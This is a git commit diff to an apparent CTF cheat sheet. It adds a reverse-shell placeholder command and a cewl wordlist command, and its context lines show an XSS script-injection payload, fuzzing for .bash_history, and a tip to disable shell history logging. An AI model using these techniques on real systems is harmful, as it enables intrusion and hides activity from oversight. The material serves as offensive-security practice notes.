mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-22 12:03:03 +00:00
Update Cheat Sheet.md
This commit is contained in:
parent
8f25eeae8b
commit
1ac8b275d8
1 changed files with 9 additions and 2 deletions
|
@ -196,6 +196,9 @@ Victim: <svg/onload=setInterval(function(){d=document;z=d.createElement("script"
|
||||||
`wfuzz -u http://<ip>:<port>/<api-endpoint>\?FUZZ\=.bash_history -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404` <br/>
|
`wfuzz -u http://<ip>:<port>/<api-endpoint>\?FUZZ\=.bash_history -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404` <br/>
|
||||||
Here `api-endpoint` can be for example `/api/v1/resources/books\?FUZZ\=.bash_history` "?" is before the parameter and FUZZ is telling to find a parameter and we are looking for `.bash_hitory` as an example
|
Here `api-endpoint` can be for example `/api/v1/resources/books\?FUZZ\=.bash_history` "?" is before the parameter and FUZZ is telling to find a parameter and we are looking for `.bash_hitory` as an example
|
||||||
|
|
||||||
|
### Web Shell Bash
|
||||||
|
`bash -c "<bash_rev_shell>"`
|
||||||
|
|
||||||
# Wordlists
|
# Wordlists
|
||||||
|
|
||||||
### Directory Bruteforcing
|
### Directory Bruteforcing
|
||||||
|
@ -210,6 +213,12 @@ Here `api-endpoint` can be for example `/api/v1/resources/books\?FUZZ\=.bash_his
|
||||||
* using `crackstation`
|
* using `crackstation`
|
||||||
* using `seclists`
|
* using `seclists`
|
||||||
|
|
||||||
|
# Generating Worlists for directory brute force
|
||||||
|
|
||||||
|
### Cewl
|
||||||
|
This spiders the given url and finding keyowrds then makes a wordlists through it's findings<br/>
|
||||||
|
`cewl.rb <ip>`
|
||||||
|
|
||||||
# King Of The Hill (KoTH)
|
# King Of The Hill (KoTH)
|
||||||
### Monitoring and Closing Shell (Linux)
|
### Monitoring and Closing Shell (Linux)
|
||||||
* strace `debugging / tamper with processes`
|
* strace `debugging / tamper with processes`
|
||||||
|
@ -240,8 +249,6 @@ Here `api-endpoint` can be for example `/api/v1/resources/books\?FUZZ\=.bash_his
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
export HISTFILE=/dev/null found this it might help you out a little when doing KOTH it basically stops bash logging your commands in the ~/.bash_history file <br/>
|
export HISTFILE=/dev/null found this it might help you out a little when doing KOTH it basically stops bash logging your commands in the ~/.bash_history file <br/>
|
||||||
sudo ifconfig tun0 down<br/>
|
sudo ifconfig tun0 down<br/>
|
||||||
sudo ip link set tun0 down<br/>
|
sudo ip link set tun0 down<br/>
|
||||||
|
|
Loading…
Reference in a new issue